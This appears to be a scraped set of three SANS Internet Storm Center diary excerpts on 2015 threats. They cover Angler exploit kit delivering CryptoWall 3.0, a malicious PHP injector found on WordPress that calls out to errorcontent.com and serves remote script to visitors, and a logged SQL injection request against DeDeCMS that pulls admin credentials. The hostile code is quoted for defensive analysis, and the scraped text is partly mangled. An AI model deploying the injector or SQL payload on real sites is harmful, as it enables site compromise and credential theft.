Category: SANS Internet Storm Center

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th) 0

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th)

Introduction In the past two days, Ive infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host whereAngler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [ 1 ].

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th) 0

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability): #2b8008# “> “> /* turn off error reporting */ @ini_set(display_errors “> /* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT”> /* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) { “> # Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent] $wp_mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua=”> # check if we have the curl extension installed if (function_exists(curl_init) function_exists(curl_exec”> # if we dont have curl, try file_get_contents which requires allow_url_fopen. elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen”> # or try fopen as a last resort elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}} if (substr($wp_8610mezd,1,3) === scr”> # The data retrieved will be echoed back to the user if it starts with the string scr.

Lazy Coordinated Attacks Against Old Vulnerabilities, (Fri, May 22nd) 0

Lazy Coordinated Attacks Against Old Vulnerabilities, (Fri, May 22nd)

Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks). So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS”> The attack: GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 – Python-urllib/2.7 DeDeCMSis a Drupal like content management system popular in China [1]